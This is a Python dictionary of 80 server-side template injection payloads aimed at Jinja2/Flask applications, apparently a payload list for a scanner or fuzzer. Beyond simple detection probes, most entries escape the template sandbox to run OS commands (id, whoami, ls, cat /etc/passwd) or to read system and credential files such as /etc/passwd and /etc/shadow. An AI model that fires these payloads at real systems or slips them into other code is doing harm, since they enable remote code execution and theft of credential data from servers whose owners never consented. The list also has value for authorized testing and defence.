sstags = {
    1: '{{7*7}}',
    2: '{{7*\'7\'}}',
    3: '{{7*7/7}}',
    4: '{{config.items()}}',
    5: '{{request.application.__globals__}}',
    6: '{{request.application.__globals__.__getitem__(\'os\').popen(\'id\').read()}}',
    7: '{{request.args.__class__.__mro__[-1].__subclasses__()[40]("ls",shell=True,stdout=-1).communicate()}}',
    8: '{{self.__init__.__globals__.__builtins__.open(\'/etc/passwd\').read()}}',
    9: '{{cycler.__init__.__globals__.__builtins__.open(\'/etc/passwd\').read()}}',
    10: '{{url_for.__globals__.os.popen(\'id\').read()}}',
    11: '{{url_for.__globals__.os.system(\'id\')}}',
    12: '{{request.application.__globals__.__builtins__.open(\'/etc/hosts\').read()}}',
    13: '{{url_for.__globals__[\'os\'].popen(\'id\').read()}}',
    14: '{{url_for.__globals__.__builtins__.open(\'/etc/shadow\').read()}}',
    15: '{{self._TemplateReference__context.cycler.__init__.__globals__.__builtins__.eval(\'__import__("os").popen("id").read()\')}}',
    16: '{{self._TemplateReference__context.cycler.__init__.__globals__.__builtins__.__dict__.values()}}',
    17: '{{().__class__.__mro__[2].__subclasses__()[40](\'id\', shell=True, stdout=-1).communicate()}}',
    18: '{{().__class__.__mro__[2].__subclasses__()[40]("ls",shell=True,stdout=-1).communicate()}}',
    19: '{{()._TemplateReference__context.cycler.__init__.__globals__.__builtins__.eval(\'__import__("os").popen("whoami").read()\')}}',
    20: '{{request["application"]["__globals__"]["os"]["popen"]("id").read()}}',
    21: '{{class.__base__.__subclasses__()}}',
    22: '{{request.application.__globals__.__builtins__.__import__("os").popen("cat /etc/passwd").read()}}',
    23: '{{().__class__.__mro__[2].__subclasses__()[40]("cat /etc/passwd",shell=True,stdout=-1).communicate()}}',
    24: '{{request.__class__.__mro__}}',
    25: '{{request.args.__class__.__mro__}}',
    26: '{{request.application.__globals__.__builtins__.__dict__.values()}}',
    27: '{{request["application"]["__globals__"]["os"]["popen"]("ls -al").read()}}',
    28: '{{request.__class__.__mro__[-1].__subclasses__()}}',
    29: '{{().__class__.__mro__[-1].__subclasses__()[40](\'ls\',shell=True,stdout=-1).communicate()}}',
    30: '{{config.__class__.__mro__}}',
    31: '{{7*\'7\'}}',
    32: '{% for c in [\'test\']|first.__class__.__mro__[-1].__subclasses__() %}{{c}}{% endfor %}',
    33: '{% for c in [].__class__.__base__.__subclasses__() %}{{c}}{% endfor %}',
    34: '{% for c in [\'test\']|first.__class__.__mro__[-1].__subclasses__() %}{{c.__init__}}{% endfor %}',
    35: '{% for c in [\'test\']|first.__class__.__mro__[-1].__subclasses__() %}{{c.__base__}}{% endfor %}',
    36: '{% for c in [\'test\']|first.__class__.__mro__[-1].__subclasses__() %}{{c.__subclasses__}}{% endfor %}',
    37: '{% for c in [].__class__.__base__.__subclasses__() %}{{c.__name__}}{% endfor %}',
    38: '{% for c in [].__class__.__base__.__subclasses__() %}{{c.__class__}}{% endfor %}',
    39: '{% for c in [].__class__.__base__.__subclasses__() %}{{c.__doc__}}{% endfor %}',
    40: '{% for c in [].__class__.__base__.__subclasses__() %}{{c.__dict__}}{% endfor %}',
    41: '{{self.__init__.__globals__.__builtins__.__import__("os").system("id")}}',
    42: '{{ self.__init__.__globals__.__builtins__.__import__("os").popen("id").read() }}',
    43: '{{self.__globals__.__getitem__(\'os\').popen(\'ls\').read()}}',
    44: '{{request.application.__globals__.__builtins__.__import__(\'os\').system(\'id\')}}',
    45: '{{ config.from_object(\'os\') }}',
    46: '{{ app.__class__.__name__ }}',
    47: '{{ app.jinja_env.globals.__builtins__.dir() }}',
    48: '{{ 7*\'7\' }}',
    49: '{{ [].class.mro() }}',
    50: '{{ app.jinja_env.globals[\'os\'].popen(\'ls\').read() }}',
    51: '{{request.application.__globals__[\'os\'].popen(\'cat /etc/shadow\').read()}}',
    52: '{{request.application.__globals__.__builtins__.eval(\'__import__("os").system("id")\')}}',
    53: '{{ cycler.__init__.__globals__[\'os\'].popen(\'id\').read() }}',
    54: '{{ request.args.__class__.__mro__[1] }}',
    55: '{{request.application.__globals__.dir()}}',
    56: '{{self.__globals__.__builtins__.__import__("os").system("id")}}',
    57: '{{ cycler.__init__.__globals__[\'os\'].system(\'id\') }}',
    58: '{{url_for.__globals__[\'os\'].popen(\'id\').read()}}',
    59: '{{ cycler.__init__.__globals__.__builtins__.open(\'/etc/passwd\').read() }}',
    60: '{{ request["application"]["__globals__"]["os"]["popen"]("id").read() }}',
    61: '{{request.args.__class__.__mro__[1].__subclasses__()}}',
    62: '{{url_for.__globals__[\'os\'].system(\'id\')}}',
    63: '{{ url_for.__globals__[\'os\'].popen(\'id\').read() }}',
    64: '{{config.__globals__.__builtins__.eval(\'__import__("os").popen("id").read()\')}}',
    65: '{{ config["application"]["__globals__"]["os"]["popen"]("id").read() }}',
    66: '{{url_for.__globals__.__getitem__(\'os\').system(\'id\')}}',
    67: '{{request.__globals__[\'os\'].popen(\'id\').read()}}',
    68: '{{request.__globals__.__getitem__(\'os\').system(\'id\')}}',
    69: '{{cyclone.__globals__.__builtins__.eval(\'__import__("os").popen("id").read()\')}}',
    70: '{{self._TemplateReference__context.cycler.__init__.__globals__.__builtins__.open(\'/etc/shadow\').read()}}',
    71: '{{self._TemplateReference__context.cycler.__init__.__globals__.open(\'/etc/passwd\').read()}}',
    72: '{{cyclone.__globals__.__builtins__.__getitem__(\'os\').system(\'id\')}}',
    73: '{{request.__globals__.__getitem__(\'os\').popen(\'ls\').read()}}',
    74: '{{request.__globals__.__builtins__.__import__("os").system("id")}}',
    75: '{{ request.__globals__.__getitem__(\'os\').popen(\'ls\').read() }}',
    76: '{{request.__globals__.__builtins__.open(\'/etc/hosts\').read()}}',
    77: '{{url_for.__globals__.__getitem__(\'os\').popen(\'cat /etc/passwd\').read()}}',
    78: '{{self._TemplateReference__context.cycler.__init__.__globals__.__builtins__.open(\'/etc/hosts\').read()}}',
    79: '{{request.args.__class__.__mro__[-1].__subclasses__()[40]("whoami",shell=True,stdout=-1).communicate()}}',
    80: '{{request.application.__globals__.__builtins__.open(\'/etc/hostname\').read()}}',
     
}
